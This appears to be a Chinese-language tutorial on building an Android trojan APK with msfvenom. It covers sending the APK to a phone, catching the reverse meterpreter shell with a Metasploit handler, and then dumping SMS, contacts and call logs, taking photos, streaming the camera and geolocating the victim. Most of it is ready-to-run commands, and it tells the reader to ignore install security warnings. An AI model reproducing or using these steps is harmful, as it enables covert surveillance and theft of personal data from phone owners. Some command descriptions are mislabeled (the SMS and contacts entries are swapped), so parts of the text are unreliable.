实验环境:kail linux 2020.3 安卓版本:10 机型: Mi 10 pro
kail IP: 10.9.152.7
注意攻击机需要与安卓手机处于一个网段,虚拟机实验的话需要桥接模式,不然安卓的数据包会传输不回去
生成木马程序
设置监听主机 lhost=
设置监听主机端口 lport=
设置保存目录 R>
msfvenom -p android/meterpreter/reverse_tcp lhost=10.9.152.7 lport=9999 R >wl.apk
将程序传送到手机
通过虚拟机将木马程序apk传送到实机,建议通过QQ传输再传到手机
手机安装的时候,无视安全错误,继续安装
使用metasploit渗透工具
打开终端,输入代码
# msfconsole
等待工具启动,然后设置handler模块
一般有5种模块:
1.渗透攻击模块(exploit),用于实际发起渗透攻击;
2.辅助模块(auxiliary),执行扫描之类的动作;
3. 后渗透攻击模块(post),进一步渗透测试
4. 攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload中的主要内容包括 shellcode,一段获取 shell 的代码。
5.后门监听模块( handler)
> use exploit/multi/handler
使用安卓的攻击负载模块
> set payload android/meterpreter/reverse_tcp
设置监听IP,为你攻击服务器的本机IP,与创建木马文件时保持一致
> set lhost 10.9.152.7
设置监听的端口,与创建木马文件时保持一致
> set lport 9999
检查设置是否有误
show options
没有错误就可以开始监听
exploit
重要!,监听后需要在手机点击刚刚安装完成的程序
设置,攻击服务器就显示 meterpreter > 已经攻击完成
渗透演示
下载手机短信记录,若获取失败,需要手动在手机提升软件的权限,小米的安全系统还是做的很足的
dump_sms
这时在桌面就会出现下载的短信文件,打开
常用指令
search -->搜索文件,命令:search text.jpg download -->下载文件,命令:download test.jpg webcam_list -->查看摄像头列表,因为手机都是前置和后置摄像头了 webcam_snap -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1 webcam_stream -->开启摄像头视频监控,同上,命令:webcam_stream -i 1 安卓系统相关命令: check_root - ->查看当前安卓是否已经root dump_calllog -->下载通话记录 dump_contacts -->下载短信记录 dump_sms -->下载通讯录 geolocate -->利用谷歌地图定位(需要安装谷歌地图)